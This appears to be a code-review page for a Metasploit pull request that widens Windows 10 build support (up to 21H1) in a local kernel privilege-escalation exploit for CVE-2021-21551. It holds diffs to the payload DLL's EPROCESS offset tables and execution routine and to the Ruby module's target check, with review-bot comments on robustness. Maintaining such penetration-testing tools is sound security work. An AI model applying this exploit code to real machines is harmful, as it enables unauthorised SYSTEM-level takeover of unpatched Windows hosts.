Land #15216, Fix targeting for CVE-2021-21551
Merge branch 'land-15216' into upstream-master
8e1391f098
Binary file not shown.
|
@ -7,7 +7,7 @@ read and write kernel-mode memory.
|
|||
* Windows 7 SP0 x64
|
||||
* Windows 7 SP1 x64
|
||||
* Windows 8.1 x64
|
||||
* Windows 10 x64 v1607 - v2009 (20H2)
|
||||
* Windows 10 x64 v1607 - 21H1 (builds 14393 - 19043)
|
||||
* Windows Server 2016 x64
|
||||
* Windows Server 2019 x64
|
||||
|
||||
|
|
|
@ -8,6 +8,8 @@ fNtQuerySystemInformation NtQuerySystemInformation = NULL;
|
|||
fRtlGetNtVersionNumbers RtlGetNtVersionNumbers = NULL;
|
||||
|
||||
void ExecutePayload(PMSF_PAYLOAD pMsfPayload) {
|
||||
if (!pMsfPayload)
|
||||
return;
|
||||
PVOID pPayload = VirtualAlloc(NULL, pMsfPayload->dwSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (!pPayload)
|
||||
return;
|
||||
|
@ -35,6 +37,7 @@ BOOL ResolveRequirements(void) {
|
|||
DWORD dwMajor, dwMinor, dwBuild;
|
||||
RtlGetNtVersionNumbers(&dwMajor, &dwMinor, &dwBuild);
|
||||
dwBuild = LOWORD(dwBuild);
|
||||
dprintf("[*] Windows version: %u.%u.%u", dwMajor, dwMinor, dwBuild);
|
||||
|
||||
if ((dwMajor == 6) && (dwMinor == 1) && (dwBuild == 7600)) {
|
||||
g_pEprocessOffsets = &EprocessOffsetsWin7Sp0;
|
||||
|
@ -45,32 +48,29 @@ BOOL ResolveRequirements(void) {
|
|||
else if ((dwMajor == 6) && (dwMinor == 3) && (dwBuild == 9600)) {
|
||||
g_pEprocessOffsets = &EprocessOffsetsWin8p1;
|
||||
}
|
||||
else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild == 14393)) {
|
||||
g_pEprocessOffsets = &EprocessOffsetsWin10v1607;
|
||||
}
|
||||
else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild == 15063)) {
|
||||
g_pEprocessOffsets = &EprocessOffsetsWin10v1703;
|
||||
}
|
||||
else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild == 16299)) {
|
||||
g_pEprocessOffsets = &EprocessOffsetsWin10v1709;
|
||||
}
|
||||
else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild == 17134)) {
|
||||
g_pEprocessOffsets = &EprocessOffsetsWin10v1803;
|
||||
}
|
||||
else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild == 17763)) {
|
||||
g_pEprocessOffsets = &EprocessOffsetsWin10v1809;
|
||||
}
|
||||
else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild == 18362)) {
|
||||
g_pEprocessOffsets = &EprocessOffsetsWin10v1903;
|
||||
}
|
||||
else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild == 18362)) {
|
||||
g_pEprocessOffsets = &EprocessOffsetsWin10v1903;
|
||||
}
|
||||
else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild == 19041)) {
|
||||
g_pEprocessOffsets = &EprocessOffsetsWin10v2004;
|
||||
}
|
||||
else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild == 18362)) {
|
||||
g_pEprocessOffsets = &EprocessOffsetsWin10v1903;
|
||||
/* targets for Windows 10 v1607 - 21H1 */
|
||||
else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild >= 14393) && (dwBuild <= 19043)) {
|
||||
if ((dwBuild < 15063)) {
|
||||
g_pEprocessOffsets = &EprocessOffsetsWin10v1607;
|
||||
}
|
||||
else if ((dwBuild < 16299)) {
|
||||
g_pEprocessOffsets = &EprocessOffsetsWin10v1703;
|
||||
}
|
||||
else if ((dwBuild < 17134)) {
|
||||
g_pEprocessOffsets = &EprocessOffsetsWin10v1709;
|
||||
}
|
||||
else if ((dwBuild < 17763)) {
|
||||
g_pEprocessOffsets = &EprocessOffsetsWin10v1803;
|
||||
}
|
||||
else if ((dwBuild < 18362)) {
|
||||
g_pEprocessOffsets = &EprocessOffsetsWin10v1809;
|
||||
}
|
||||
else if ((dwBuild < 19041)) {
|
||||
g_pEprocessOffsets = &EprocessOffsetsWin10v1903;
|
||||
}
|
||||
else if ((dwBuild <= 19043)) {
|
||||
g_pEprocessOffsets = &EprocessOffsetsWin10v2004;
|
||||
}
|
||||
}
|
||||
else {
|
||||
return FALSE;
|
||||
|
|
|
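Review bot: The nested chain inside the new build-range branch (`dwBuild >= 14393 && dwBuild <= 19043`) ends with `else if ((dwBuild <= 19043))`, which only restates the outer bound, and has no terminal `else`; if someone later widens the outer range without touching the inner ceiling, `g_pEprocessOffsets` is left unset and the function presumably still reports success, which with a kernel read/write primitive means a bugcheck rather than a clean abort. I would make the last arm a plain `else { g_pEprocessOffsets = &EprocessOffsetsWin10v2004; }` or, if the explicit ceiling is wanted, append `else { return FALSE; }` after it. The comment `/* targets for Windows 10 v1607 - 21H1 */` should also say why intermediate builds reuse an earlier table, e.g. `/* 1909 (18363) reuses the 1903 table and 20H2/21H1 (19042/19043) the 2004 table: the three EPROCESS offsets did not move between those releases */` — the identical v1909/v2009 entries in the header hunk on this page suggest that is the reasoning, but it should be confirmed against the offset tables. ResolveRequirements starts before this hunk and its success return path is outside it.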
@ -47,9 +47,9 @@ const static EPROCESS_OFFSETS EprocessOffsetsWin8p1 = { 0x2e8, 0x348, 0x2e0 };
|
|||
const static EPROCESS_OFFSETS EprocessOffsetsWin10v1607 = { 0x2f0, 0x358, 0x2e8 };
|
||||
/* Windows 10 v1703 (10.0.15063) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/1703%20Redstone%202%20(Creators%20Update)/_EPROCESS */
|
||||
const static EPROCESS_OFFSETS EprocessOffsetsWin10v1703 = { 0x2e8, 0x358, 0x2e0 };
|
||||
/* Windows 10 v1709 (10.0.16299) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/1709%20Redstone%203%20(Fall%20Creators%20Update */
|
||||
/* Windows 10 v1709 (10.0.16299) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/1709%20Redstone%203%20(Fall%20Creators%20Update)/_EPROCESS */
|
||||
const static EPROCESS_OFFSETS EprocessOffsetsWin10v1709 = { 0x2e8, 0x358, 0x2e0 };
|
||||
/* Windows 10 v1803 (10.0.17134) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/1803%20Redstone%204%20(Spring%20Creators%20Update)/_EPROCESS*/
|
||||
/* Windows 10 v1803 (10.0.17134) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/1803%20Redstone%204%20(Spring%20Creators%20Update)/_EPROCESS */
|
||||
const static EPROCESS_OFFSETS EprocessOffsetsWin10v1803 = { 0x2e8, 0x358, 0x2e0 };
|
||||
/* Windows 10 v1809 (10.0.17763) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/1809%20Redstone%205%20(October%20Update)/_EPROCESS */
|
||||
const static EPROCESS_OFFSETS EprocessOffsetsWin10v1809 = { 0x2e8, 0x358, 0x2e0 };
|
||||
|
@ -57,9 +57,9 @@ const static EPROCESS_OFFSETS EprocessOffsetsWin10v1809 = { 0x2e8, 0x358, 0x2e0
|
|||
const static EPROCESS_OFFSETS EprocessOffsetsWin10v1903 = { 0x2f0, 0x360, 0x2e8 };
|
||||
/* Windows 10 v1909 (10.0.18362) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/1909%2019H2%20(November%202019%20Update)/_EPROCESS */
|
||||
const static EPROCESS_OFFSETS EprocessOffsetsWin10v1909 = { 0x2f0, 0x360, 0x2e8 };
|
||||
/* Windows 10 v2004 (10.0.19041) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/2004%2020H1%20(May%202020%20Update)/_EPROCESS */
|
||||
/* Windows 10 v2004 / 20H1 (10.0.19041) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/2004%2020H1%20(May%202020%20Update)/_EPROCESS */
|
||||
const static EPROCESS_OFFSETS EprocessOffsetsWin10v2004 = { 0x448, 0x4b8, 0x440 };
|
||||
/* Windows 10 v2009 (10.0.19041) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/2009%2020H2%20(October%202020%20Update)/_EPROCESS */
|
||||
/* Windows 10 v2009 / 20H2 (10.0.19041) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/2009%2020H2%20(October%202020%20Update)/_EPROCESS */
|
||||
const static EPROCESS_OFFSETS EprocessOffsetsWin10v2009 = { 0x448, 0x4b8, 0x440 };
|
||||
#endif
|
||||
|
||||
|
|
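Review bot: As far as this page shows, `EprocessOffsetsWin10v1909` and `EprocessOffsetsWin10v2009` are no longer referenced: the range dispatch in the C hunk selects only the v1903 and v2004 tables for builds 18362-19043, and each of the two unused entries is byte-identical to its neighbour. Either remove the duplicates or annotate them so a reader does not conclude a build was skipped, e.g. above `EprocessOffsetsWin10v2009`: `/* same layout as v2004; ResolveRequirements uses the v2004 table for builds 19041-19043 */`. The v2009 comment still says `(10.0.19041)` while the module documentation now counts builds up to 19043 under this table — if 20H2/21H1 share the 19041 kernel base, which appears to be the assumption, say so in the comment.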
|
@ -87,8 +87,8 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
|
||||
return true if sysinfo_value =~ /Windows 7/ && ((build_num == 7600) || (build_num == 7601))
|
||||
return true if sysinfo_value =~ /Windows 8\.1/ && (build_num == 9600)
|
||||
return true if sysinfo_value =~ /Windows 10/ && (build_num >= 14393 && build_num <= 19042)
|
||||
return true if sysinfo_value =~ /Windows 2016/ && (build_num >= 14393 && build_num <= 19042)
|
||||
return true if sysinfo_value =~ /Windows 10/ && (build_num >= 14393 && build_num <= 19043)
|
||||
return true if sysinfo_value =~ /Windows 2016/ && (build_num >= 14393 && build_num <= 19043)
|
||||
|
||||
false
|
||||
end
|
||||
|
|
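Review bot: The build window `14393..19043` is now a literal on both the `/Windows 10/` and `/Windows 2016/` lines and must also agree with the `dwBuild <= 19043` ceiling in the DLL's ResolveRequirements, so three copies can drift silently; I would hoist it into one named range, `win10_builds = (14393..19043)`, and write `return true if sysinfo_value =~ /Windows 10/ && win10_builds.cover?(build_num)` (likewise for the `/Windows 2016/` line). The `/Windows 2016/` pattern is presumably what also admits Server 2019, which the module documentation lists as a target; a one-line comment saying so would stop the next reader from thinking 2019 was dropped. The enclosing method starts before this hunk.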